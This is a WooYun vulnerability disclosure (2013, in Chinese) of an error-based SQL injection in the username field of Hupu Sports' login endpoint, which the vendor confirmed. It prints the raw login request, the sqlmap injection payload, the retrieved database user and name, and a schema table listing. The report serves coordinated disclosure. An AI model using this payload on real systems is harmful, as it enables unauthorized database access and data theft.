当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043687

漏洞标题:APP终结者4#虎扑体育App云端主站Post_Sql注入2

相关厂商:虎扑体育网

漏洞作者: zzR

提交时间:2013-11-22 10:00

修复时间:2014-01-06 10:01

公开时间:2014-01-06 10:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-22: 细节已通知厂商并且等待厂商处理中
2013-11-22: 厂商已经确认,细节仅向厂商公开
2013-12-02: 细节向核心白帽子及相关领域专家公开
2013-12-12: 细节向普通白帽子公开
2013-12-22: 细节向实习白帽子公开
2014-01-06: 细节向公众公开

简要描述:

默默耕耘~

详细说明:

app名称:虎扑新声
这个app登陆请求回到主站的

POST /m/login?from=hupuApp HTTP/1.1
Host: passport.hupu.com
Accept-Language: zh-cn
Pragma: no-cache
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko)
Mobile/11B554a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://passport.hupu.com/m/login?from=hupuApp
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Content-Length: 108
Origin: http://passport.hupu.com
Accept-Encoding: gzip, deflate
username=1111111&password=11111&rememberme=1&submit=%E7%99%BB+%E5%BD%95&jumpurl=http%3A%2F%2Fm.hupu.com


username存在注入

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=1237890s' AND (SELECT 6352 FROM(SELECT COUNT(*),CONCAT(0x3a64676c3a,(SELECT (C
ASE WHEN (6352=6352) THEN 1 ELSE 0 END)),0x3a6e77703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHA
RACTER_SETS GROUP BY x)a) AND 'bFvP'='bFvP&password=1237890hp&rememberme=1&submit=%E7%99%BB+%E5%BD%9
5&jumpurl=http://m.hupu.com
---
[09:13:20] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[09:13:20] [INFO] fetching current user
[09:13:20] [INFO] retrieved: hc_ucenterad@192.168.1.%
current user: 'hc_ucenterad@192.168.1.%'
[09:13:20] [INFO] fetching current database
[09:13:20] [INFO] retrieved: hc_ucenter
current database: 'hc_ucenter'


hc_center

1.png


2.png


内容--认证关键字?

3.png


漏洞证明:

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


未继续

修复方案:

Nginx 很快啊!

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-11-22 10:04

厂商回复:

会尽快安排修复,感谢您对虎扑体育网的支持!!!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-22 11:38 | yhoojj ( 普通白帽子 | Rank:110 漏洞数:14 | BurNing)

    Mark

  2. 2013-11-22 11:43 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    哟~

  3. 2013-11-22 12:09 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @小胖子 昂~进来坐坐啊

  4. 2013-11-22 13:48 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    没有智能机的飘过